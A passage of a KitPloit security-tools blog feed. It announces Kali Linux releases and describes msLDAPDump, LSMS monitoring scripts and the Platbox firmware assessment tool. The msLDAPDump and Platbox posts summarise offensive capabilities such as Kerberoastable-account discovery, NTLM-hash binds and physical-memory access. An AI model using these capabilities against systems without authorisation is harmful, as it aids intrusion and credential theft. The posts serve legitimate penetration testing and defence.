tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger2307125tag:blogger.com,1999:blog-8317222231133660547.post-42295666330003857822024-03-02T22:01:00.002-03:002024-03-02T22:01:27.800-03:00Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/s1200/kali-linux-banner-2024.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/w640-h334/kali-linux-banner-2024.1-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">2023.4 release from December</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#introducing-the-micro-mirror-free-software-cdn">Micro Mirror Free Software CDN</a></strong> - FCIX Software Mirror reached out offering to host our images, and we said yes</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#2024-theme-refresh">2024 Theme Refresh</a></strong> - Our yearly theme refresh with all new wallpapers and GRUB theme</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#other-desktop-changes">Other Desktop Environment Changes</a></strong> - A few new tweaks to our default environments</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#kali-nethunter-updates">NetHunter Updates</a></strong> - NetHunter Rootless for Android 14, Bad Bluetooth HID attacks, and other updates</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny tools!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2024-1-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2024.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16525270025300223462023-12-06T16:48:00.001-03:002023-12-06T16:48:44.695-03:00Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeSZqwKhlzGxuhn7BQFGfzkW7eZhtbQpGaqsf9Sc9pOIutKLzsXq52gM5BXnGVasufyoSulQENGizsQkucsHVEa2NfdXl5iAndy42TK32A6TzyUwjb83fYU4QLc9_mRDuLcEbGDJ_wpY7vngJSc96Sdgo7XMbkBV-6h5xJcWqB8NifoeU_2CJnaa4Pf_sY/s1200/kali-linux-banner-2023.4-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeSZqwKhlzGxuhn7BQFGfzkW7eZhtbQpGaqsf9Sc9pOIutKLzsXq52gM5BXnGVasufyoSulQENGizsQkucsHVEa2NfdXl5iAndy42TK32A6TzyUwjb83fYU4QLc9_mRDuLcEbGDJ_wpY7vngJSc96Sdgo7XMbkBV-6h5xJcWqB8NifoeU_2CJnaa4Pf_sY/w640-h334/kali-linux-banner-2023.4-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-3-release/">2023.3 release from August</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#cloud-arm-marketplaces">Cloud ARM64</a></strong> - Now marketplaces on Amazon AWS and Microsoft Azure have ARM64 option</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#vagrant-hyper-v-support">Vagrant Hyper-V</a></strong> - Our Vagrant offering now supports Hyper-V</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#raspberry-pi-5">Raspberry Pi 5</a></strong> - Kali on the latest Raspberry Pi foundation device</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#gnome-45">GNOME 45</a></strong> - Kali theme is on the latest versions</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#internal-infrastructure">Internal Infrastructure</a></strong> - Peak at what is going on behind the scenes with mirrorbits</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new & updated packages</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.4</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17151341680504293432023-08-23T23:08:00.001-04:002023-08-23T23:08:17.938-04:00Kali Linux 2023.3 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q00yQCkQdJJS7TW7EmfLvp9IQrug_4k3R3_0zelWzmv1AJ26cWjo4Kmdjs-1c7RvMSfv7cX0hIV9-Udmu9LtoXdxlf1QXcRKxdyg3B7cqvgH2okU1Ma2cEqWCXJZCdi45M-1hnrlaQBePmJSlk1-35uLoXY8uEArRyJvqgHjTw6LSVPlts5jmCFsqHCH/s1200/banner-2023.3-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q00yQCkQdJJS7TW7EmfLvp9IQrug_4k3R3_0zelWzmv1AJ26cWjo4Kmdjs-1c7RvMSfv7cX0hIV9-Udmu9LtoXdxlf1QXcRKxdyg3B7cqvgH2okU1Ma2cEqWCXJZCdi45M-1hnrlaQBePmJSlk1-35uLoXY8uEArRyJvqgHjTw6LSVPlts5jmCFsqHCH/w640-h334/banner-2023.3-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.3. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The highlights of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-2-release/">2023.2 release from May</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#internal-infrastructure">Internal Infrastructure</a></strong> - Major stack changes is under way</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#kali-autopilot">Kali Autopilot</a></strong> - The automation attack framework has had an major overhaul</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#new-tools-in-kali">New Tools</a></strong> - 9 new tools added this time round!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-3-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.3</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74943859094477661872023-06-24T08:30:00.001-04:002023-06-24T08:30:00.128-04:00msLDAPDump - LDAP Enumeration Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w" style="text-align: -webkit-center;"><img alt="" border="0" height="222" id="BLOGGER_PHOTO_ID_7233982034686329570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w=w640-h222" width="640" /></a></p><p dir="auto"><br /></p> <p dir="auto">msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Binding Anonymously</h3> <p dir="auto">Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, <a href="https://www.kitploit.com/search/label/Domain%20Controller" target="_blank" title="domain controller">domain controller</a> hostnames, and more.</p> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/anonbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w"><img alt="" border="0" height="222" id="BLOGGER_PHOTO_ID_7233982034686329570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w=w640-h222" width="640" /></a> </p> <h3 dir="auto" tabindex="-1">Credentialed Bind</h3> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/authbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUWZF2dxcMBBHZyJHixwrTIlS4P3-U45y8jF3s9PpZMZ1kxanypVjHRVtLAXOEXuQX4ZpBVhLDo24jD132os8t_QHPMQQx5iE80bET5Ezyxmh8y_H_nvg6ICAuM5ENdauQ387ZMC26s5Sbj_V-aqTZ1lZpGf2K4KBiDzOan-re4D7EZZAqsEUTidhmwA"><img alt="" border="0" height="178" id="BLOGGER_PHOTO_ID_7233982041596421442" src="https://blogger.googleusercontent.com/img/a/AVvXsEhUWZF2dxcMBBHZyJHixwrTIlS4P3-U45y8jF3s9PpZMZ1kxanypVjHRVtLAXOEXuQX4ZpBVhLDo24jD132os8t_QHPMQQx5iE80bET5Ezyxmh8y_H_nvg6ICAuM5ENdauQ387ZMC26s5Sbj_V-aqTZ1lZpGf2K4KBiDzOan-re4D7EZZAqsEUTidhmwA=w640-h178" width="640" /></a> </p> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/ntlmbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhsJ8XoQ3g2968ND74US6AzmOltiD_MD-QO1oOdI2tOIoyEUF4FPP_kttXltSf1_tDaqL9NpjJhXJGyf2C0Ik-CKkDLkOS1R8_EgCxBfB2-xI298C5lw_SXJ3kOYTwXdtHYU02gUqUuyCIBXj5u1RZX27exfjNJK2RBQeDNqjjeO8orSCmxVMCr8_phxA"><img alt="" border="0" height="188" id="BLOGGER_PHOTO_ID_7233982049260479970" src="https://blogger.googleusercontent.com/img/a/AVvXsEhsJ8XoQ3g2968ND74US6AzmOltiD_MD-QO1oOdI2tOIoyEUF4FPP_kttXltSf1_tDaqL9NpjJhXJGyf2C0Ik-CKkDLkOS1R8_EgCxBfB2-xI298C5lw_SXJ3kOYTwXdtHYU02gUqUuyCIBXj5u1RZX27exfjNJK2RBQeDNqjjeO8orSCmxVMCr8_phxA=w640-h188" width="640" /></a> </p> Users can bind to LDAP utilizing valid user account <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> or a valid NTLM hash. Using credentials will obtain the same information as the anonymously binded request, as well as checking for the following: <ul dir="auto"> <li>Subnet scan for systems with ports 389 and 636 open</li> <li>Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)</li> <li>Users</li> <li>Groups</li> <li>Kerberoastable Accounts</li> <li>ASREPRoastable Accounts</li> <li>Constrained Delegation</li> <li>Unconstrained Delegation</li> <li>Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses</li> <li>Identify Domain Controllers</li> <li>Identify Servers</li> <li>Identify Deprecated Operating Systems</li> <li>Identify MSSQL Servers</li> <li>Identify Exchange Servers</li> <li>Group Policy Objects (GPO)</li> <li>Passwords in User description fields</li> </ul> <p dir="auto">Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.</p> <ul class="contains-task-list"> <li class="task-list-item">Add support for LDAPS (LDAP Secure)</li> <li class="task-list-item">NTLM Authentication</li> <li class="task-list-item">Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)</li> <li class="task-list-item">Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)</li> <li class="task-list-item">Figure out how to link the name to the Description field dump at the end of the script</li> <li class="task-list-item">mplement <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> options rather than inputs</li> <li class="task-list-item">Check for deprecated operating systems in the domain</li> </ul> <h3 dir="auto" tabindex="-1">Mandatory Disclaimer</h3> <p dir="auto">Please keep in mind that this tool is meant for <a href="https://www.kitploit.com/search/label/Ethical%20Hacking" target="_blank" title="ethical hacking">ethical hacking</a> and <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/dievus/msLDAPDump" rel="nofollow" target="_blank" title="Download msLDAPDump">Download msLDAPDump</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-31801211123937186412023-06-18T08:30:00.001-04:002023-06-18T08:30:00.131-04:00LSMS - Linux Security And Monitoring Scripts<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOUAv4hUykZ7J9MXslUWbxCDdlHdtbIiIMFSGK9cWC7UGCIY9e3NHe6DdxYtRR50ZdqSyROXW3zOdvWk0KOv1UEeXNA3OqCuSVUK1CNkgr3H9OYCM3UIFSukK_k-zf4nsXK43n30h3uePBiAHWqvanxuri0bxEHY9AWSzfakNd4mYQTxUVL4bwWJBxg/s537/h39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="353" data-original-width="537" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOUAv4hUykZ7J9MXslUWbxCDdlHdtbIiIMFSGK9cWC7UGCIY9e3NHe6DdxYtRR50ZdqSyROXW3zOdvWk0KOv1UEeXNA3OqCuSVUK1CNkgr3H9OYCM3UIFSukK_k-zf4nsXK43n30h3uePBiAHWqvanxuri0bxEHY9AWSzfakNd4mYQTxUVL4bwWJBxg/w640-h420/h39.png" width="640" /></a></div><div><br /></div><div> <p dir="auto">These are a collection of security and monitoring <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using <a href="https://github.com/sqall01/alertR" rel="nofollow" target="_blank" title="AlertR">AlertR</a> as notification channel.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Repository Structure</h2> <p dir="auto">The scripts are located in the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> <code>scripts/</code>. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.</p> <p dir="auto">Each script has a configuration file in the <code>scripts/config/</code> directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.</p> <p dir="auto">The <code>scripts/lib/</code> directory contains code that is shared between different scripts.</p> <p dir="auto">Scripts using a <code>monitor_</code> prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the <code>--init</code> argument.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> are needed (if any needed at all). If requirements are needed, install them before running the script.</p> <p dir="auto">The shared configuration file <code>scripts/config/config.py</code> contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the <code>scripts/config/</code> directory. If no configuration file was found, a default setting is used and the results are printed out.</p> <p dir="auto">Finally, you can run all configured scripts by executing <code>start_search.py</code> (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.</p> <h3 dir="auto" tabindex="-1">Monitoring</h3> <p dir="auto">If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:</p> <ol dir="auto"> <li> <p dir="auto">Set up a notification channel that is supported by the scripts (currently printing out, mail, or <a href="https://github.com/sqall01/alertR" rel="nofollow" target="_blank" title="AlertR">AlertR</a>).</p> </li> <li> <p dir="auto">Configure the scripts that you want to run using the configuration files in the <code>scripts/config/</code> directory.</p> </li> <li> <p dir="auto">Execute <code>start_search.py</code> with the <code>--init</code> argument to initialize the scripts with the <code>monitor_</code> prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.</p> </li> <li> <p dir="auto">Set up a cron job as <code>root</code> user that executes <code>start_search.py</code> (e.g., <code>0 * * * * root /opt/LSMS/start_search.py</code> to start the search hourly).</p> </li> </ol> <h2 dir="auto" tabindex="-1">List of Scripts</h2> <table> <tbody><tr> <th>Name</th> <th>Script</th> </tr> <tr> <td>Monitoring cron files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_cron.py" rel="nofollow" target="_blank" title="monitor_cron.py">monitor_cron.py</a></td> </tr> <tr> <td>Monitoring /etc/hosts file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_hosts_file.py" rel="nofollow" target="_blank" title="monitor_hosts_file.py">monitor_hosts_file.py</a></td> </tr> <tr> <td>Monitoring /etc/ld.so.preload file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_ld_preload.py" rel="nofollow" target="_blank" title="monitor_ld_preload.py">monitor_ld_preload.py</a></td> </tr> <tr> <td>Monitoring /etc/passwd file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_passwd.py" rel="nofollow" target="_blank" title="monitor_passwd.py">monitor_passwd.py</a></td> </tr> <tr> <td>Monitoring modules</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_modules.py" rel="nofollow" target="_blank" title="monitor_modules.py">monitor_modules.py</a></td> </tr> <tr> <td>Monitoring SSH authorized_keys files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_ssh_authorized_keys.py" rel="nofollow" target="_blank" title="monitor_ssh_authorized_keys.py">monitor_ssh_authorized_keys.py</a></td> </tr> <tr> <td>Monitoring systemd unit files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_systemd_units.py" rel="nofollow" target="_blank" title="monitor_systemd_units.py">monitor_systemd_units.py</a></td> </tr> <tr> <td>Search executables in /dev/shm</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_dev_shm.py" rel="nofollow" target="_blank" title="search_dev_shm.py">search_dev_shm.py</a></td> </tr> <tr> <td>Search <a href="https://www.kitploit.com/search/label/Fileless" target="_blank" title="fileless">fileless</a> programs (memfd_create)</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_memfd_create.py" rel="nofollow" target="_blank" title="search_memfd_create.py">search_memfd_create.py</a></td> </tr> <tr> <td>Search hidden ELF files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_hidden_exe.py" rel="nofollow" target="_blank" title="search_hidden_exe.py">search_hidden_exe.py</a></td> </tr> <tr> <td>Search immutable files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_immutable_files.py" rel="nofollow" target="_blank" title="search_immutable_files.py">search_immutable_files.py</a></td> </tr> <tr> <td>Search kernel thread impersonations</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_non_kthreads.py" rel="nofollow" target="_blank" title="search_non_kthreads.py">search_non_kthreads.py</a></td> </tr> <tr> <td>Search processes that were started by a now disconnected SSH session</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_ssh_leftover_processes.py" rel="nofollow" target="_blank" title="search_ssh_leftover_processes.py">search_ssh_leftover_processes.py</a></td> </tr> <tr> <td>Search running deleted programs</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_deleted_exe.py" rel="nofollow" target="_blank" title="search_deleted_exe.py">search_deleted_exe.py</a></td> </tr> <tr> <td>Test script to check if <a href="https://www.kitploit.com/search/label/Alerting" target="_blank" title="alerting">alerting</a> works</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/test_alert.py" rel="nofollow" target="_blank" title="test_alert.py">test_alert.py</a></td> </tr> <tr> <td>Verify integrity of installed .deb packages</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/verify_deb_packages.py" rel="nofollow" target="_blank" title="verify_deb_packages.py">verify_deb_packages.py</a></td> </tr> </tbody></table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqall01/LSMS" rel="nofollow" target="_blank" title="Download LSMS">Download LSMS</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8864648326357664352023-06-09T04:06:00.001-04:002023-06-09T04:06:04.385-04:00Kali Linux 2023.2 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-rvy7a_CJvpwGJUoFfFgxB0yLv8NARp1n0gFG8adQnU5MqGn9DRAHt1uhMDVoSxAlOpeLgy2gAi61AHZTFAlvBTOav4RTyR8nmagL5x9p9fViiUsiN1DOc0SpV02kjuDPrX6AqR3ya4Zkfk_ZZnS-Oteun-BwTsK6utW10Wug0ZemQtGYEm_IWwMhA/s1200/kali-banner-2023.2-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-rvy7a_CJvpwGJUoFfFgxB0yLv8NARp1n0gFG8adQnU5MqGn9DRAHt1uhMDVoSxAlOpeLgy2gAi61AHZTFAlvBTOav4RTyR8nmagL5x9p9fViiUsiN1DOc0SpV02kjuDPrX6AqR3ya4Zkfk_ZZnS-Oteun-BwTsK6utW10Wug0ZemQtGYEm_IWwMhA/w640-h334/kali-banner-2023.2-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.2. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The <a href="https://bugs.kali.org/changelog_page.php">changelog</a> highlights over the last few weeks since March’s <a href="https://www.kali.org/releases/">release</a> of <a href="https://www.kali.org/blog/kali-linux-2023-1-release/">2023.1</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#new-hyper-v-vm-image">New VM image for Hyper-V</a></strong> - With “Enhanced Session Mode” out of the box</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#xfce--pipewire">Xfce audio stack update: enters PipeWire</a></strong> - Better audio for Kali’s default desktop</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#i3-desktop-overhaul">i3 desktop overhaul</a></strong> - i3-gaps merged with i3</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#xfce">Desktop updates</a></strong> - Easy hashing in Xfce</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#gnome-44">GNOME 44</a></strong> - Gnome Shell version bump</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#gnome-44">Icons & menus updates</a></strong> - New apps and icons in menu</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#new-tools-in-kali">New tools</a></strong> - As always, various new packages added</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-2-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.2</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-62737352816402694792023-05-27T08:30:00.014-04:002023-05-27T08:30:00.138-04:00Platbox - UEFI And SMM Assessment Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7233974935195861698" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw=w640-h614" width="640" /></a></p><div><br /></div> <p dir="auto">UEFI and SMM <a href="https://www.kitploit.com/search/label/Assessment" target="_blank" title="Assessment">Assessment</a> Tool</p> <h2 dir="auto" tabindex="-1">Features</h2> <p dir="auto">Platbox is a tool that helps assessing the security of the platform:</p> <ul dir="auto"> <li>Dumps the platform registers that are interesting security-wise <ul dir="auto"> <li>Flash Locks</li> <li>MMIO and Remapping Locks</li> <li>SMM Base and Locks</li> <li>MSRs</li> </ul> </li> <li>RW <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> to the PCI configuration space of devices.</li> <li>RW to physical memory and virtual memory.</li> <li>Allows allocating physical memory and map memory to usermode.</li> <li>Read and Write MSRs.</li> <li>Dump SPI Flash content (BIOS) into a file.</li> <li>Basic dumb SMI Fuzzer.</li> <li>Dump S3 Bootscript (from SMM-Lockbox) into a file.</li> <li>Dump EFI Memory Map (Linux only for now).</li> <li>List UEFI variables.</li> <li>Supports Linux and Windows.</li> <li>Supports Intel and AMD.</li> </ul><span><a name='more'></a></span><div><br /></div> <h3 dir="auto" tabindex="-1">Example of 'chipset' command output for an AMD platform</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/IOActive/Platbox/blob/main/example_chipset_output_amd.png" rel="nofollow" target="_blank" title="UEFI and SMM Assessment Tool (3)"></a><a 